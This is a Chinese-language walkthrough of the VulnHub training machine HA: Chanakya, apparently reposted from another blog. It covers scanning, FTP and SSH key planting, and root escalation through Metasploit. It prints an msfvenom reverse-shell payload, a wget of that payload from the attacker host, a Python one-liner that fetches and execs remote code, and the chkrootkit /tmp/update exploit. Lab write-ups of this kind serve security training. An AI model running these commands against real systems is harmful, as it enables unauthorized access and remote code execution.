chanakya

Posted bingtang123

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了chanakya相关的知识,希望对你有一定的参考价值。

仅供个人娱乐

参考http://www.saulgoodman.cn/HA-Chanakya.html

靶机信息

https://www.vulnhub.com/entry/ha-chanakya,395/

一、主机探测

arp-scan -l

技术图片

nmap -sV -p 1-65535 -A 192.168.236.136

技术图片

dirb http://192.168.236.136

技术图片
技术图片
技术图片
技术图片
技术图片

 

技术图片

二、漏洞的查找和利用

百度   得到ROT13的加密方式

技术图片

pcap流量包,直接下载即可

技术图片
技术图片

ashoka                             kautilya

首先进行21端口登录

技术图片

22端口登陆失败

技术图片

创建ssh-keygen

上传.ssh 使用kali免密登录

ssh-keygen

技术图片

然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中

root@kali:~/桌面# cd ~/.ssh

root@kali:~/.ssh# cat id_rsa.pub > authorized_keys

技术图片

mkdir .ssh

cd.ssh

put authorized_keys

技术图片

root@kali:~/.ssh# ssh ashoka@192.168.236.136

技术图片

提权

先msf生成一个木马反弹一个meterpreter回话过来

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf

技术图片

python -m SimpleHTTPServer

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.236.129

技术图片

cd /tmp

wget http://192.168.236.129:8000/shell.elf

技术图片
技术图片

sysinfo

使用post模块来查看可以利用那些提权exploit:

run post/multi/recon/local_exploit_suggester

技术图片

info exploit/linux/local/netfilter_priv_esc_ipv4

技术图片
技术图片

失败

使用命令注入来反弹一个shell:

use exploit/multi/script/web_delivery

技术图片

set lhost 192.168.236.129

技术图片

python -c "import sys;u=__import__(‘urllib‘+{2:‘‘,3:‘.request‘}[sys.version_info[0]],fromlist=(‘urlopen‘,));r=u.urlopen(‘http://192.168.236.129:8080/m9eTnBmiM‘);exec(r.read());"

在目标机运行:

技术图片

使用rootkit攻击模块:

技术图片

这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。

set rhosts 192.168.236.136

set session 1

set lport 8888

exploit

python -c‘import pty;pty.spawn("/bin/bash")‘

 

技术图片
技术图片

参考文章http://www.saulgoodman.cn/HA-Chanakya.html

以上是关于chanakya的主要内容,如果未能解决你的问题,请参考以下文章